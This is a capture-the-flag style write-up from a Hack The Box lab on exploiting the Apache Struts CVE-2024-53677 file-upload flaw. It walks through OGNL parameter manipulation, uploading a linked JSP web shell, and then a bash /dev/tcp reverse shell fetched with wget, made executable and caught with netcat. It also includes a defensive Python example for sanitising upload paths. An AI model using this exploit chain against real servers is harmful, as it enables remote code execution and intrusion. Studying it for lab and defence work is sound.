Related vulnerability
Title:
Apache Struts security vulnerability
(CVE-2024-53677)
Description: Apache Struts is an open-source project of the Apache Software Foundation (USA). It is an open-source MVC framework for building enterprise-grade Java web applications, offered as two main product lines, Struts 1 and Struts 2. Apache Struts versions 2.0.0 up to (but not including) 6.4.0 contain a security vulnerability caused by a flaw in the file upload logic.
Description
Apache Struts CVE-2024-53677 Exploitation
Introduction
# CVE-2024-53677 Exploitation
### Apache Struts RCE via File Upload
## Description
CVE-2024-53677 is a vulnerability affecting Apache Struts versions from 2.0.0 up to (but not including) 6.4.0. **⚠️ This was exploited in a Hack The Box lab.**
The file upload logic in Apache Struts is flawed: an attacker can manipulate file upload parameters to achieve path traversal, and under some circumstances this allows uploading a malicious file that can then be used for Remote Code Execution.
🔗 **Reference:** [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2024-53677)
## Reconnaissance
### **Identifying an Attack Vector**
<img alt="image" src="https://github.com/user-attachments/assets/06a746b4-e8bd-4af5-b045-19da69f5715d" style="width:500px; height:250px; object-fit:cover;"/>
1. The website has an **image upload** feature.
2. Uploaded files are stored at: `ip/uploads/20250213_014317/starwars.png`
3. On successful upload, the shareable link for the image has the URL `ip/s/04ab2f40`
4. Finding the Apache Struts Version
- An exposed `pom.xml` revealed **Apache Struts 6.3.0.1**
- Confirmed vulnerable to **CVE-2024-53677**
📸 **pom.xml exposure:**
<img alt="image" src="https://github.com/user-attachments/assets/ee0db346-b7ba-4e61-aa3d-4abe833323f8" style="width:500px; height:250px; object-fit:cover;"/>
## Exploitation
### **Modifying File Upload Request**
To exploit this vulnerability we use **BurpSuite** and its **Repeater** functionality to modify the request before sending it. Below we have an unedited request.
<p>
<img alt="image" src="https://github.com/user-attachments/assets/8bc1f4ab-9020-4da8-ba85-ea00c42075d9" style="width:500px; height:250px; object-fit:cover;"/>
</p>
Our obstacles are that the site **blocks** file types other than **[JPG, JPEG, PNG, GIF]** and that anything in the /uploads directory is **not executable**. To get around these, we first add another parameter.
<p>
<img alt="test" src="https://github.com/user-attachments/assets/98b4c912-e7dd-4581-93a3-b9df9e70bce7" style="width:500px; height:250px; object-fit:cover;"/>
</p>
The added parameter exploits OGNL (Object-Graph Navigation Language), which Apache Struts uses to process input data. The FileUploadInterceptor processes this parameter before handling the actual PNG image, allowing attackers to manipulate the request and potentially execute arbitrary code.
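As an added defensive example (not code from this writeup or from Struts itself), the handler below shows how an upload endpoint can neutralise the file-name manipulation described above: it discards any directory component the client sends, enforces the extension allow-list on the final extension, and confirms the resolved path is still inside the upload root. `UPLOAD_ROOT`, the timestamped subfolder and the function names are assumptions made for the example.

```python
import posixpath
import re

UPLOAD_ROOT = "/var/www/app/uploads"         # assumed upload directory (not from the lab)
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}  # the allow-list the lab site enforced

# Only a conservative character set survives: no separators, no NUL, no leading dot.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


def naive_upload_path(client_name: str, subdir: str) -> str:
    """The flawed pattern: the client-supplied name is joined straight onto
    the upload directory, so '../' segments walk out of it."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, subdir, client_name))


def safe_upload_path(client_name: str, subdir: str) -> str:
    """Return an absolute path under UPLOAD_ROOT, or raise ValueError.

    `subdir` is the server-generated timestamp folder (e.g. 20250213_014317);
    `client_name` is whatever the browser, or an attacker, put in the request."""
    # 1. Keep only the base name, whichever separator the client used.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise ValueError("empty or traversal-only file name")
    # 2. Reject anything outside the conservative character set.
    if not _SAFE_NAME.match(base):
        raise ValueError(f"illegal characters in file name: {base!r}")
    # 3. Enforce the allow-list on the *final* extension,
    #    so 'x.png.jsp' is rejected while 'x.jpg' passes.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext!r}")
    # 4. Normalise and confirm the result is still inside the upload root.
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, subdir, base))
    if not full.startswith(UPLOAD_ROOT + "/"):
        raise ValueError("resolved path escapes upload root")
    return full


if __name__ == "__main__":
    for name in ("starwars.png", "../../evil.png", "shell.jsp", "x.png/../shell.jsp"):
        try:
            print(f"{name!r:24} -> {safe_upload_path(name, '20250213_014317')}")
        except ValueError as exc:
            print(f"{name!r:24} -> rejected: {exc}")
```

Compare `naive_upload_path("../../evil.png", ...)`, which resolves outside the upload directory, with the hardened version, which keeps the same input inside it.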
### **Finalising the Exploit**
After adding the modified parameter, the server response confirms that the file was successfully uploaded. However, we notice that the file path differs from the usual upload directory.
<p>
<img alt="plshelp" src="https://github.com/user-attachments/assets/88d2ddf5-9f86-4386-ae52-ac01e7aa19c4" style="width:500px; height:250px; object-fit:cover;"/>
</p>
#### **Attaching the Payload**
Next, we embed the payload by appending it directly below the image data and right before our injected parameters. The shell payload can be sourced from 🔗 **Reference:** [shell.jsp](https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsp)
Additionally, one crucial detail is that the request requires `Upload` with a capital U rather than lowercase `upload`. This follows the exploit structure observed in: 🔗 **Reference:** [exploit.py](https://github.com/EQSTLab/CVE-2024-53677/blob/main/CVE-2024-53677.py)
With these modifications in place, we send the request. The server responds similarly, confirming a successful upload and reflecting the adjusted file path.
#### **Navigating the Exploit**
Now, by navigating to the following URL, we can interact with our uploaded shell.
<pre> ip/shelll.jsp?action=cmd&cmd=id </pre>
<img alt="final shell" src="https://github.com/user-attachments/assets/9170b1d3-2025-40d5-b3d8-e602aba7a196" style="width:500px; height:250px; object-fit:cover;"/>
At this stage, we can establish a reverse shell using a locally hosted web server. A simple way to achieve this is with Python's built-in HTTP server:
<pre>python3 -m http.server 3004</pre>
Next, create a basic shell script (e.g., shell.sh) containing a bash reverse shell one-liner, with $IP and $PORT set to the listener's address and port:
<pre>echo "bash -i >& /dev/tcp/$IP/$PORT 0>&1" > shell.sh</pre>
On the target, use wget to download it:
<pre>wget http://ip_address/filename -O /tmp/filename</pre>
After downloading, make it executable:
<pre>chmod +x /tmp/filename</pre>
Then use nc (netcat) on the attacking machine to listen for the reverse shell:
<pre>nc -lvnp $PORT</pre>
Finally, execute the script on the target:
<pre>/tmp/filename</pre>